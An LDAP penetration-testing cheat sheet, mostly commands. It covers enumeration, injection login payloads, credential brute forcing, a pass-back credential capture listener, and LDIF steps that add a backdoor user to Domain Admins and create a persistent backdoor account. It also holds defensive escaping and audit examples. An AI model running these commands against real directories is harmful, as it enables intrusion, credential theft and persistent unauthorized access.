
LDAP (Lightweight Directory Access Protocol)

Default Ports: 389 (LDAP), 636 (LDAPS), 3268 (Global Catalog)

Lightweight Directory Access Protocol (LDAP) is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an IP network. LDAP is commonly used for user authentication, authorization, and storing organizational information. Microsoft's Active Directory is built on LDAP. LDAP directories store information hierarchically in a tree structure.

Connect

Using ldapsearch

Use ldapsearch for querying LDAP directories and extracting information.

Basic LDAP Queries

# Anonymous bind (no authentication)
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com"

# With credentials
ldapsearch -x -H ldap://target.com -D "cn=admin,dc=example,dc=com" -w password -b "dc=example,dc=com"

# LDAPS (SSL/TLS)
ldapsearch -x -H ldaps://target.com:636 -D "cn=admin,dc=example,dc=com" -w password -b "dc=example,dc=com"

Advanced LDAP Searches

# Search specific object class
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=person)"

# Get all attributes
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "*"

Using ldapwhoami

Use ldapwhoami to test LDAP authentication and identify current user context.

# Test authentication
ldapwhoami -x -H ldap://target.com -D "cn=admin,dc=example,dc=com" -w password

# Anonymous bind
ldapwhoami -x -H ldap://target.com

Using ldapadd/ldapmodify

Use LDAP modification tools to add, modify, and delete directory entries.

# Add new entry
ldapadd -x -H ldap://target.com -D "cn=admin,dc=example,dc=com" -w password -f new_entry.ldif

# Modify entry
ldapmodify -x -H ldap://target.com -D "cn=admin,dc=example,dc=com" -w password -f modify.ldif

# Delete entry
ldapdelete -x -H ldap://target.com -D "cn=admin,dc=example,dc=com" -w password "cn=user,ou=users,dc=example,dc=com"

Using Python (ldap3)

Use Python ldap3 library for programmatic LDAP access and automation.

from ldap3 import Server, Connection, ALL

# Bind with the admin credentials; get_info=ALL also fetches the root DSE and schema
server = Server('target.com', get_info=ALL)
conn = Connection(server, 'cn=admin,dc=example,dc=com', 'password', auto_bind=True)

# Search for all person objects under the base DN
conn.search('dc=example,dc=com', '(objectClass=person)')
for entry in conn.entries:
    print(entry)

conn.unbind()

Recon

Service Detection with Nmap

Use Nmap to detect LDAP services and identify server capabilities.

nmap -p 389,636,3268 target.com

Identify LDAP server software and version through banner grabbing.

Using netcat

# Using netcat
nc -vn target.com 389

Using nmap

# Using nmap
nmap -p 389 -sV --script ldap-rootdse target.com

Using ldapsearch

# Get root DSE
ldapsearch -x -H ldap://target.com -b "" -s base "(objectclass=*)"

Root DSE Information

Extract detailed server information from LDAP root DSE.

Basic Root DSE Queries

# Get naming contexts
ldapsearch -x -H ldap://target.com -b "" -s base "(objectclass=*)" namingContexts

# Get all rootDSE attributes
ldapsearch -x -H ldap://target.com -b "" -s base "(objectclass=*)" "*" "+"

Important Root DSE Attributes

# Important attributes to check:
# - namingContexts (base DNs)
# - defaultNamingContext (primary domain)
# - supportedLDAPVersion
# - supportedSASLMechanisms
# - dnsHostName

Enumeration

Domain Information

Querying domain objects reveals organizational structure, forest information, and domain functional levels.

# Get domain info
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=domain)"

# Get naming contexts
ldapsearch -x -H ldap://target.com -b "" -s base namingContexts

# Forest information
ldapsearch -x -H ldap://target.com -b "" -s base forestFunctionality

User Enumeration

LDAP directories contain detailed user information including email addresses, phone numbers, group memberships, and account status.

Basic User Queries

# List all users
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=person)"

# Users with specific attributes
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=user)" cn mail

# Active Directory users
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=user)" sAMAccountName

Advanced User Queries

# Users whose passwords never expire
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(userAccountControl:1.2.840.113556.1.4.803:=65536)"

# Service accounts
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(&(objectClass=user)(servicePrincipalName=*))"

Group Enumeration

Group information reveals organizational structure and helps identify privileged users like Domain Admins.

# List all groups
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=group)" cn

# Domain Admins
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=Domain Admins)" member

# All admin groups
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(&(objectClass=group)(cn=*admin*))" cn member

# Group members
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=Administrators)" member

Computer Enumeration

Enumerate computer objects and domain controllers in the LDAP directory.

# List computers
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=computer)" cn

# Domain controllers
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(userAccountControl:1.2.840.113556.1.4.803:=8192)" dNSHostName

# Operating systems
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=computer)" operatingSystem operatingSystemVersion

Attribute Enumeration

Extract specific attributes that may contain sensitive information or useful data.

Contact Information Extraction

# Extract email addresses
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(mail=*)" mail

# Extract phone numbers
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(telephoneNumber=*)" telephoneNumber

Sensitive Attribute Queries

# User descriptions (may contain passwords)
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(description=*)" description

# Service Principal Names (SPNs)
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(servicePrincipalName=*)" servicePrincipalName

Attack Vectors

Anonymous Bind

Anonymous bind allows unauthenticated access to LDAP directories, potentially exposing sensitive organizational information.

# Test anonymous access
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=*)"

# If successful, enumerate everything
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=user)"
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=group)"

Null Bind

Null bind attempts to authenticate with empty credentials, which may still reveal directory information.

# Bind with empty credentials
ldapsearch -x -H ldap://target.com -D "" -w "" -b "dc=example,dc=com"

# May reveal information even with null credentials

LDAP Injection

LDAP injection attacks manipulate LDAP queries to bypass authentication or extract unauthorized information.

Basic Injection Payloads

# In login forms using LDAP
# Normal query: (&(uid=username)(password=pass))

# Injection payloads
username: admin)(&(|
password: any

# Results in: (&(uid=admin)(&(|)(password=any))
# Always true condition

Advanced Injection Techniques

# Wildcard injection
username: *
password: *

# OR injection
username: *)(uid=*))(|(uid=*
password: any

# Comment injection
username: admin)(cn=*))%00
password: any
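As an added example that is not part of the original page, the login filter construction that yields the injected filter shown above, beside a hardened version that escapes user input per RFC 4515 (function names are assumptions made here):

```python
# Added example: LDAP filter construction with and without RFC 4515 escaping.
# Function names are hypothetical; the payload used below is the one on this page.

# RFC 4515 requires these characters to be escaped inside an assertion value.
_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Escape a user-supplied value for use inside an LDAP search filter."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_unsafe(username: str, password: str) -> str:
    """Vulnerable: raw user input is concatenated into the filter."""
    return f"(&(uid={username})(password={password}))"


def build_login_filter_safe(username: str, password: str) -> str:
    """Hardened: every user-controlled value is escaped before concatenation."""
    return (
        f"(&(uid={escape_filter_value(username)})"
        f"(password={escape_filter_value(password)}))"
    )


if __name__ == "__main__":
    payload = "admin)(&(|"  # constructed: the injection payload from this page
    print(build_login_filter_unsafe(payload, "any"))
    print(build_login_filter_safe(payload, "any"))
```

With escaping in place the parentheses become literal characters of the uid value, so the filter structure the application intended is preserved.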

Brute Force

Brute forcing LDAP credentials can reveal weak passwords on directory services.

Using Hydra

hydra -L users.txt -P passwords.txt target.com ldap2 -s 389

Using Nmap

nmap -p 389 --script ldap-brute --script-args ldap.base='"dc=example,dc=com"' target.com

Using Metasploit

use auxiliary/scanner/ldap/ldap_login
set RHOSTS target.com
set USERNAME admin
set PASS_FILE passwords.txt
run

Pass-Back Attack

Pass-back attacks redirect LDAP authentication to attacker-controlled servers to capture credentials.

# If you can modify LDAP server settings
# Change LDAP server IP to attacker's server

# Setup rogue LDAP server
sudo responder -I eth0

# Or use simple LDAP logger
sudo nc -lvnp 389

# Device will send credentials to attacker's server

Post-Exploitation

Extract All Users

Extract comprehensive user information for analysis and further exploitation.

Complete User Dump

# Complete user dump with all attributes
ldapsearch -x -H ldap://target.com \
-D "cn=admin,dc=example,dc=com" -w password \
-b "dc=example,dc=com" \
"(objectClass=user)" \
"*" "+" > all_users.ldif

# Parse for passwords in description
grep -i "description:" all_users.ldif | grep -i "pass\|pwd"

Targeted User Extraction

# Extract specific attributes
ldapsearch -x -H ldap://target.com \
-D "cn=admin,dc=example,dc=com" -w password \
-b "dc=example,dc=com" \
"(objectClass=user)" \
sAMAccountName mail userAccountControl

Kerberoasting Targets

Identify service accounts with SPNs for Kerberoasting attacks.

# Find SPNs (Service Principal Names)
ldapsearch -x -H ldap://target.com \
-D "cn=admin,dc=example,dc=com" -w password \
-b "dc=example,dc=com" \
"(&(objectClass=user)(servicePrincipalName=*))" \
sAMAccountName servicePrincipalName

# Request service tickets
# Then crack offline with hashcat

ASREPRoasting Targets

Identify users vulnerable to ASREPRoasting attacks.

# Find users with "Do not require Kerberos preauthentication"
ldapsearch -x -H ldap://target.com \
-D "cn=admin,dc=example,dc=com" -w password \
-b "dc=example,dc=com" \
"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \
sAMAccountName

Sensitive Attribute Extraction

Search for sensitive information stored in user attributes.

Password Hunting

# Look for passwords in attributes
ldapsearch -x -H ldap://target.com \
-D "cn=admin,dc=example,dc=com" -w password \
-b "dc=example,dc=com" \
"(description=*)" description | grep -i "pass\|pwd\|secret"

Additional Attribute Searches

# Check info field
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(info=*)" info

# Comment field
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(comment=*)" comment

Privilege Escalation

Escalate privileges by modifying group memberships and user permissions.

# Add user to admin group
cat > add_admin.ldif << EOF
dn: cn=Domain Admins,cn=Users,dc=example,dc=com
changetype: modify
add: member
member: cn=backdoor_user,cn=Users,dc=example,dc=com
EOF

ldapmodify -x -H ldap://target.com \
-D "cn=admin,dc=example,dc=com" -w password \
-f add_admin.ldif

Persistence

Establish persistent access by creating backdoor accounts and maintaining access.

# Create backdoor user
cat > backdoor.ldif << EOF
dn: cn=System Service,cn=Users,dc=example,dc=com
changetype: add
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: System Service
sAMAccountName: svc_system
userPrincipalName: svc_system@example.com
userPassword: P@ssw0rd123!
EOF

ldapadd -x -H ldap://target.com \
-D "cn=admin,dc=example,dc=com" -w password \
-f backdoor.ldif

# Add to Domain Admins (as shown above)

Common LDAP Queries

# All users
(objectClass=user)

# All groups
(objectClass=group)

# All computers
(objectClass=computer)

# Domain Admins
(cn=Domain Admins)

# Users with SPNs
(&(objectClass=user)(servicePrincipalName=*))

# Disabled accounts
(userAccountControl:1.2.840.113556.1.4.803:=2)

# Accounts that never expire
(userAccountControl:1.2.840.113556.1.4.803:=65536)

# Locked accounts
(lockoutTime>=1)
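As an added example that is not part of the original page, a small audit routine that decodes the userAccountControl bits matched by the bitwise filters above and in the Computer Enumeration and ASREPRoasting sections (2, 8192, 65536, 4194304) from an ldapsearch LDIF export; the sample LDIF is constructed and the function names are assumptions:

```python
# Added example (not from the original page): decode userAccountControl bits
# from an ldapsearch LDIF export. The bit values are the ones this page's
# 1.2.840.113556.1.4.803 (bitwise AND) filters match on. The sample LDIF is
# constructed; it assumes no folded lines or base64 "::" values.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",         # 2
    0x2000: "SERVER_TRUST_ACCOUNT",   # 8192: domain controller
    0x10000: "DONT_EXPIRE_PASSWORD",  # 65536
    0x400000: "DONT_REQ_PREAUTH",     # 4194304: ASREPRoasting target
}
# Flags a defender would normally want reviewed on user accounts.
RISKY = {"DONT_EXPIRE_PASSWORD", "DONT_REQ_PREAUTH"}

def parse_ldif(text: str) -> list:
    """Parse single-line 'attr: value' records as ldapsearch prints them."""
    entries, current = [], {}
    for line in text.splitlines() + [""]:   # trailing "" flushes the last entry
        if not line.strip():
            if current:
                entries.append(current)
            current = {}
            continue
        attr, _, value = line.partition(": ")
        current[attr] = value
    return entries

def decode_uac(value: int) -> set:
    """Names of the known flags set in a userAccountControl value."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}

def risky_accounts(ldif_text: str) -> dict:
    """Map sAMAccountName -> risky flags, like the page's bitwise filters do."""
    report = {}
    for entry in parse_ldif(ldif_text):
        hits = decode_uac(int(entry.get("userAccountControl", "0"))) & RISKY
        if hits:
            report[entry["sAMAccountName"]] = hits
    return report

SAMPLE_LDIF = """\
sAMAccountName: svc_backup
userAccountControl: 66048

sAMAccountName: jdoe
userAccountControl: 4194816

sAMAccountName: guest
userAccountControl: 514
"""
```

The constructed values combine NORMAL_ACCOUNT (512) with the flag under test, so 66048 is a never-expiring password, 4194816 is an account without Kerberos preauthentication, and 514 is a disabled account that the report leaves out.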

LDAP Filter Examples

# AND operator
(&(objectClass=user)(cn=admin))

# OR operator
(|(cn=admin)(cn=user))

# NOT operator
(!(cn=guest))

# Wildcard
(cn=admin*)
(cn=*admin*)

# Present
(mail=*)

# Greater than
(badPwdCount>=3)

Useful Tools

Tool                     | Description             | Primary Use Case
-------------------------|-------------------------|---------------------
ldapsearch               | LDAP search tool        | Querying LDAP
ldapmodify               | LDAP modification tool  | Modifying entries
JXplorer                 | LDAP GUI browser        | Visual exploration
Apache Directory Studio  | LDAP IDE                | Complete management
ldapdomaindump           | AD info dumper          | Domain enumeration
windapsearch             | AD enumeration          | PowerShell-less enum
enum4linux               | SMB/LDAP enumerator     | Linux-based enum
Metasploit               | Exploitation framework  | Automated testing

Security Misconfigurations

  • ❌ Anonymous bind allowed
  • ❌ Null bind permitted
  • ❌ Weak admin passwords
  • ❌ LDAP injection vulnerabilities
  • ❌ No SSL/TLS (using port 389)
  • ❌ Excessive permissions granted
  • ❌ Sensitive data in attributes
  • ❌ No access controls
  • ❌ Verbose error messages
  • ❌ Default configurations
  • ❌ No logging enabled
  • ❌ Outdated LDAP server